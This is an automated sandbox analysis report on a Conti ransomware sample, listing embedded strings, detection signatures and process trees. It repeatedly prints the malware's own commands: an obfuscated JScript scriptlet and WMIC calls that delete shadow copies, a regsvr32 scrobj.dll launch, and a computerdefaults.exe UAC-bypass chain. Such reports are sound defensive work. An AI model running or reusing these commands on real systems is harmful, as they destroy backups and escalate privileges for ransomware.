Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: taskhostw.exe, 0000001E.00000000.272532648.00000255FA050000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: svchost.exe, svchost.exe, 0000000B.00000002.495504372.0000020A025A0000.00000040.00000001.sdmp, taskhostw.exe, taskhostw.exe, 0000001E.00000002.500519852.00000255F9EB0000.00000040.00000001.sdmp, readme.txt.3.dr String found in binary or memory: https://www.torproject.org/
Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmp String found in binary or memory: https://xsts.auth.xboxlive.com
Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmp String found in binary or memory: https://xsts.auth.xboxlive.com/

Spam, unwanted Advertisements and Ransom Demands:

barindex
Found ransom note / readme
Source: C:\Users\Public\readme.txt Dropped file: <?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>
Yara detected Conti ransomware
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3020, type: MEMORY
Deletes shadow drive data (may be related to ransomware)
Source: 7906dc47_by_Libranalysis.exe Binary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: 7906dc47_by_Libranalysis.exe, 00000002.00000002.326052029.000001BB04C60000.00000040.00000001.sdmp Binary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
Source: sihost.exe Binary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: sihost.exe, 00000003.00000002.495205256.0000024D2C410000.00000040.00000001.sdmp Binary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
Source: svchost.exe Binary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: svchost.exe, 00000004.00000002.494909669.0000024843FF0000.00000040.00000001.sdmp Binary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
Source: svchost.exe Binary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: svchost.exe, 0000000B.00000002.495504372.0000020A025A0000.00000040.00000001.sdmp Binary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
Source: ComputerDefaults.exe, 00000016.00000002.249758809.000001AD70D3F000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: ComputerDefaults.exe, 00000016.00000002.249758809.000001AD70D3F000.00000004.00000020.sdmp Binary or memory string: \semprocess call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.l /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process calsk
Source: ComputerDefaults.exe, 00000018.00000002.252744519.000001B8C4546000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"(m
Source: ComputerDefaults.exe, 00000018.00000002.252744519.000001B8C4546000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"-1002
Source: WMIC.exe, 0000001C.00000002.267392040.0000026D07EB0000.00000004.00000040.sdmp Binary or memory string: C:\Windows\system32\wbem\wmic.exeprocesscallcreatevssadmin.exe Delete Shadows /all /quiety 6 Model 85
Source: WMIC.exe, 0000001C.00000003.254725092.0000026D07CC5000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe Delete Shadows /all /quiet
Source: WMIC.exe, 0000001C.00000003.254725092.0000026D07CC5000.00000004.00000001.sdmp Binary or memory string: __PARAMETERSvssadmin.exe Delete Shadows /all /quietPz
Source: WMIC.exe, 0000001C.00000002.266165051.0000026D07C60000.00000004.00000020.sdmp Binary or memory string: C:\Windows\system32\C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"C:\Windows\system32\wbem\wmic.exe
Source: WMIC.exe, 0000001C.00000002.266165051.0000026D07C60000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: WMIC.exe, 0000001C.00000002.267417577.0000026D07EB5000.00000004.00000040.sdmp Binary or memory string: ows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"windir=C:
Source: WMIC.exe, 0000001C.00000002.267431566.0000026D07EBA000.00000004.00000040.sdmp Binary or memory string: call create "vssadmin.exe Delete Shadows /all /quiet"
Source: WMIC.exe, 0000001C.00000002.267431566.0000026D07EBA000.00000004.00000040.sdmp Binary or memory string: process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: WMIC.exe, 0000001C.00000002.267431566.0000026D07EBA000.00000004.00000040.sdmp Binary or memory string: mmand: process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: taskhostw.exe Binary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: taskhostw.exe, 0000001E.00000002.500519852.00000255F9EB0000.00000040.00000001.sdmp Binary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
Source: WMIC.exe, 0000001F.00000002.267280739.000002599DD40000.00000004.00000040.sdmp Binary or memory string: C:\Windows\system32\wbem\wmic.exeprocesscallcreatevssadmin.exe Delete Shadows /all /quiety 6 Model 85W
Source: WMIC.exe, 0000001F.00000002.266586711.000002599DAE3000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe Delete Shadows /all /quiet
Source: WMIC.exe, 0000001F.00000002.266586711.000002599DAE3000.00000004.00000001.sdmp Binary or memory string: __PARAMETERSvssadmin.exe Delete Shadows /all /quietv
Source: WMIC.exe, 0000001F.00000002.267314275.000002599DD4A000.00000004.00000040.sdmp Binary or memory string: call create "vssadmin.exe Delete Shadows /all /quiet"
Source: WMIC.exe, 0000001F.00000002.267314275.000002599DD4A000.00000004.00000040.sdmp Binary or memory string: process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: WMIC.exe, 0000001F.00000002.267314275.000002599DD4A000.00000004.00000040.sdmp Binary or memory string: mmand: process call create "vssadmin.exe Delete Shadows /all /quiet"{
Source: WMIC.exe, 0000001F.00000002.266247843.000002599DA80000.00000004.00000020.sdmp Binary or memory string: C:\Windows\system32\C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"C:\Windows\system32\wbem\wmic.exe
Source: WMIC.exe, 0000001F.00000002.266247843.000002599DA80000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: WMIC.exe, 0000001F.00000003.255019902.000002599DAE3000.00000004.00000001.sdmp Binary or memory string: __PARAMETERSvssadmin.exe Delete Shadows /all /quiety
Source: WMIC.exe, 0000001F.00000002.267299677.000002599DD45000.00000004.00000040.sdmp Binary or memory string: ows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"windir=C:
Source: ComputerDefaults.exe, 00000021.00000002.266675123.000001E991F58000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
Source: ComputerDefaults.exe, 00000023.00000002.266697182.000002090E753000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"|
Source: ComputerDefaults.exe, 00000023.00000002.266697182.000002090E753000.00000004.00000020.sdmp Binary or memory string: "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"-1002Z
Modifies existing user documents (likely ransomware behavior)
Source: C:\Windows\System32\sihost.exe File moved: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx Jump to behavior
Source: C:\Windows\System32\sihost.exe File deleted: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx Jump to behavior
Source: C:\Windows\System32\sihost.exe File moved: C:\Users\user\Desktop\LSBIHQFDVT\SUAVTZKNFL.pdf Jump to behavior
Source: C:\Windows\System32\sihost.exe File deleted: C:\Users\user\Desktop\LSBIHQFDVT\SUAVTZKNFL.pdf Jump to behavior
Source: C:\Windows\System32\sihost.exe File moved: C:\Users\user\Desktop\LSBIHQFDVT.docx Jump to behavior

System Summary:

barindex
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000009.00000002.241117986.00000232C5730000.00000004.00000020.sdmp Binary or memory string: C:\Windows\system32\C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"|
Contains functionality to call native functions
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB5710B6 NtAllocateVirtualMemory, 2_2_00007FF6AB5710B6
Detected potential crypto function
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB02490104 2_2_000001BB02490104
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB05820A16 2_2_000001BB05820A16
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB05890A16 2_2_000001BB05890A16
Source: C:\Windows\System32\sihost.exe Code function: 3_2_0000024D2C410A16 3_2_0000024D2C410A16
Source: C:\Windows\System32\svchost.exe Code function: 4_2_0000024843FF0A16 4_2_0000024843FF0A16
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000020A025A0A16 11_2_0000020A025A0A16
Source: C:\Windows\System32\taskhostw.exe Code function: 30_2_00000255F9EB0A16 30_2_00000255F9EB0A16
PE file does not import any functions
Source: 7906dc47_by_Libranalysis.exe Static PE information: No import functions for PE file found
Source: 7906dc47_by_Libranalysis.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.rans.evad.winEXE@57/122@0/0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe File created: C:\Users\Public\readme.txt Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3272:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5048:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_01
Source: C:\Windows\System32\taskhostw.exe Mutant created: \Sessions\1\BaseNamedObjects\eltalkfzj
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5488:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_01
Source: 7906dc47_by_Libranalysis.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 7906dc47_by_Libranalysis.exe Virustotal: Detection: 42%
Source: unknown Process created: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe 'C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe'
Source: C:\Windows\System32\sihost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\sihost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c computerdefaults.exe
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c computerdefaults.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c computerdefaults.exe
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c computerdefaults.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\sihost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' Jump to behavior
Source: C:\Windows\System32\sihost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe Jump to behavior
